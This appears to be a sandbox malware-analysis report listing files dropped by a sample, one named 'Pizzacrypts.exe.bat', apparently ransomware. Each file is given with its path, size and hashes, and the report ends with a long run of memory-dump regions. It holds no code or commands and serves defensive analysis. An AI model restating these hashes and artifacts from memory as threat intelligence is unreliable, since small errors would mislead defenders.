C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
301f68d05bf22b8abd7abefd2311ad38

SHA1
3f9ae993f8516276bda30918347f624b9759a5f4

SHA256
3d6e5f9ce187412b1b678bb85176daeb83d15a8fae2228c012cc8da105a94845

SHA512
e2daf1da8d41628034486f55aa0b824062e0c82d44bc5bce8d80d9ff07f376af398e79f534c7d058d11840739cf51a9f6b4b530db34c66fd9e780f860d2eb722

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ebbc74ccdaddaba1f259b930f65d4143

SHA1
2bd4c5899dbc217e3a7580c064a30cd20e538f8d

SHA256
9d2341f4ceb3408cc73ca648398ef7840ec6c30f7b89bc6bdb7f1e3652b0ce19

SHA512
79522d57eecc5a85dcb791e2329ccf0cfb8df4ea826180f762c5a30c1b3233b1cbf34be54dfd53d0a23563bfb264c2a0be65a02a4d0918d9524c5adbf4f268fe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
26c1c701a9cc46e1870e900842d62f6f

SHA1
55caf05f2354fb2751e6ee1647608d3dce7104f1

SHA256
669884e7bc316795101b25ec50b3a7e020a747641fb7826e7de28c1a62b01b86

SHA512
b7ff741163005ea5359f65510dd8318db395ff898b53f5d9d4bc8b2ef8a4f3cc4d7abf0ce7b36c2e9267c4e6ceb3ef1fd336de1d9d00e942bc5d1e90d4f89046

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7751d385cbf1d248d4ee9ef5060c6dc4

SHA1
a3f53b6ffc32ce2b16384d80705aadac4a1735df

SHA256
e844849ff1b03d56a958c785adb37db8bb30f42daa1db8205460bdbf135bd898

SHA512
a9e502a333a2c40e611a2214e265e5ffad47febf6d6f009b384490a268f772bb829b9e714920305759948030cae5e945364d511654de31464bab65e5dd2ee06b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b59a4ea6972797d078ba1b89af5dd152

SHA1
8fe2182eca255660bc5777dc030423228dbf5aec

SHA256
81f9d553118c8eda005bf761ce66e4eb5c24aae2d0c1fd9251d06949ba67bc52

SHA512
e747d3f158d15c23a9a29d7f70131789d9dea1d61a21a60090da19eb45bcc4fc9dc99bac6738e9d363795e24ee9a095d5d2178cb6877ba3b5b522776faa394e2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
711d5fcf009043c2518bd2537b67b2b6

SHA1
4f1923bb259c52fe7ef0d7473b13cd5faa3ab552

SHA256
b32cfe6834adb080d320511bcf0b97b397bbfe6b11be9c1a157c9e85554dcdde

SHA512
a5c79f43be7108f399b879b36879a5f077dd8252c1aa46554945ff05104ff4fd07b326be1abefcf0ae6bee29e88ad2fcbc7ecf99ef751b364f5438afd8b769c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
aa3d1d0ea67dadba72fcb5b0249978a5

SHA1
d1e0cc980209b2adc34e759f2d4bef0a8fc6addc

SHA256
07f2c597272ea93349ad6b81a3ce7cf76f38a4995e2d3b8ecff9da6d342e7e41

SHA512
1585b68b231b0963d6d99f8688e4da0cda16dda67abdce3055156b059d1d366dfa51f5c3c7ff57aae2dbff745cbc8f74e1f72142bf2e1b6550e5a95d934eca29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
21d5518a282aa314501637494d557516

SHA1
9df461d7b041fddbab86b5c6df12cc31451361cd

SHA256
72630af763248164f25f709c52c777b320d387457285c1fba833a15c980d31d9

SHA512
ffd49b272a2805e9bffaeda671a913a6db7ee7b6290b9d9c5d5b97bbc5dda55e0cc52b3de7a3230141d3e35ec563439db217a03aa871c753884e15a68f68f137

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a5be9eff162f7470223011cd49f0512e

SHA1
6c2a34223a097c632274a2b4590fee853d477bfe

SHA256
f4ea424355dd9702b692d0ed33b2cecbc8c068752f4a3fb09231155258184b42

SHA512
23f2cca0954d11b682421ba6ca0f3ba36c1b765538a62120be16543506be8ab9c98cc3271814da5385df1d2d1ac3d07f936c9050941951edea66567e9f7e3aad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d9ae85fd0d749ac5fc63724f92b8edd8

SHA1
1005d0cc93221a6480c7e701a34f3083622148aa

SHA256
d7f1b1cc2970ecfe1da264e51592ce80a726125cd1e1864972104efe9f8fdf9a

SHA512
0030aaa870178f332f312f2e4b0c74a775f85cfd82bfbc39e170729c477cbdb83ad4aaf7828de5a7002183058888c721a66e9fc7d9d4c2a82fbd897ccf449761

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b86753ac0bc47ffeb4af204acb8dd09b

SHA1
9ef72fe353915d2fb06c16e73a803b1c05a6b660

SHA256
857f7b635bed24fb99b2e50d2884cb28949096d5dbaecfdff061d49791e1fe4c

SHA512
d69b5f3627656399eeb330054c5f0bc3276070a589ffbd6168ad91375967fa09e20bd68b3a9a9744cb698266724a3c4a93fecaf85eb3869af97fbcd5cb917a6c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
feedbae69d3c6defff0d1737939e41a3

SHA1
33807027b9f008f578096203821d14de97ae0247

SHA256
8b61e465e28560a75fe7f9398b6c0d24c3e86a2e401d2bc70c108db6b2279172

SHA512
daf9602e64b676882007b444852f06c3885d7e534e40695cc1b31c0b6a5e9b8e0b3b1af9c32786ba72a222af5816d73b20c80c7429011f8f6f27a56b278eee4a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
af5798c9302cf349de87034609f3b9f4

SHA1
fa7268cea2ba390c6959fd9f68af634ab7bdf772

SHA256
93020152c0cb293745e9711f6f268feed2087b0f38e40bb4f82caa3cd6278f3c

SHA512
4fba2f133812aa8521e357de0fe85fe2e655226bef615e85f44c4385043dcea44c39d8660212fa77eb0c8264e84e6781ad7fb41132775cc078bf38cb20d0b0fb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1e5c84869c3d7bf4b7dff84bc85a316a

SHA1
bceeb9c998d4f713aa1eb9d8b07849a54d78c7c9

SHA256
a2b12e2f4378087accb01ace3cfac32060ff112fe7fe32c8932d1ed7c6db38cb

SHA512
a57e04327dfb7f05a5a675ad25b92ce03fb7b8867266a985dd85282c060906b7844ca7779e8870ae91bf56bbccb4766ae469bc7b5d23d80952e2b6fe9c6ec660

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
224827a73bf0de4b3925fd44f8c35129

SHA1
ed2043b0db9423d51464fb364d4dd6b4ed9a146b

SHA256
fe1bf0d58c0d393a0235b9ae2cb9b26489929614e0ea3a36ee6883b0e0e24fab

SHA512
afb0a0afdb06374b2ec0afcebb1cab88396b0c1b363e6035ca9ed61f3d64a1d7c5c8f3ba0bce90e60d1be310d6fffa77339365d4e87614deb9b4a5a469a70ad1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

Filesize
4KB

MD5
da597791be3b6e732f0bc8b20e38ee62

SHA1
1125c45d285c360542027d7554a5c442288974de

SHA256
5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

SHA512
d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\Popular Government Questions from [email protected]

Filesize
28KB

MD5
eb8fdf9a46519aad1f5ba20cddc19e42

SHA1
cd228a5300bedb9f85d6dbe546a17329145077fb

SHA256
070a39e06f4f02e07610d2572d657d2c18d36697f1a0cec398cdd34ff1ebe07c

SHA512
910ddf23dc4d34c4c3daf28f8e98adba2ac7979622132fe592c8dd15f3e9459f60e089377801c7f1e33ad47de9ae00c12637f79dc2059f943d32fb3196a2cca9

Download Submit
C:\Users\Admin\AppData\Local\Temp\317FKF8LCG90FUIAT.txt

Filesize
772B

MD5
336282ee25aba99cef8f0703398f3b9d

SHA1
ec9d064a5a498cae47499a60fad2d3e5ad886230

SHA256
89c93a3893f515cf5619cf283c3e2e6f1184148a30bf7da246d4677ffcb56ba8

SHA512
2ab66d5b7d16ffe0ac807a7e95f0569a63cc3b0b81590ee2a3b595b93ca7209ee7a55b38dba0cff5a3a4b3cc700941d2c3b9618b4015faa0a014e3d6ca02d25f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab40BB.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pizzacrypts.exe.bat

Filesize
116B

MD5
6a0745efde9bb188fa8db9dfa985a98a

SHA1
e666742ac42635ab126f23c635d53791d2b0cd64

SHA256
a12c562a79adbc64e884887aa89c7556ba15ef03a38a58e3ec738b83a7ca8648

SHA512
f17a93b893587362dc060eb5e9c34ce78b10f346803fee98375f52499da9a0a2977ca6c4f2bef06c3859d3ccc649023fec5a1a231eaf81d41e2d7ea3f07de6ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4198.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~DF10EED2FDDC5C1043.TMP

Filesize
16KB

MD5
4167b69709bb75a6a3de43748abff047

SHA1
e29340d3cf555742db2afa741d9d32c179e3b074

SHA256
038341c713e6b3e65cb90377cea9038289b6b98296389417293666e94ee0810c

SHA512
0584604f6313bc7688bee2ed3ff9ee716099e41f2c9749a3f3760c01f15cf24334362d13d6b0b91854e5e853d30716e7dc53a31e2c0671a5c900a2403ce131b2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\storage\permanent\chrome\idb\[email protected]

Filesize
48KB

MD5
aea7a47e9df4996b925ad50ce2de53bc

SHA1
472e94dc609fb3a82d983069d8249f27f191f70c

SHA256
0273c8d755b0b961b940984c05f5016368b2d527dab231eebdceb5d57197ed8f

SHA512
d4261d967a84ea7a983527d63bba5b1829c24d9c62518ad8d9561a6b885f045db4df9c405032fbb2dc3a9ebedd12fbdbcfcc58ca84439ae0db8de94eb847b21c

Download Submit
memory/2172-0-0x00000000002F0000-0x00000000002F5000-memory.dmp

Filesize
20KB

Download
memory/2520-51-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-118-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-114-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-106-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-87-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-101-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-128-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-126-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-95-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-104-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-100-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-60-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-67-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-61-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-63-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-73-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-1-0x0000000000300000-0x0000000000400000-memory.dmp

Filesize
1024KB

Download
memory/2520-55-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-57-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-53-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-46-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-45-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-2302-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-21-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2520-2301-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2520-19-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-92-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-122-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-85-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-110-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-112-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-109-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-105-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-99-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-93-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-120-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-3-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-86-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-83-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-81-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-77-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-75-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-56-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-79-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-54-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-52-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-71-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-7-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-9-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-12-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2520-14-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-8-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-17-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2520-18-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-16-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-15-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download
memory/2520-5-0x0000000000400000-0x0000000000EF0000-memory.dmp

Filesize
10.9MB

Download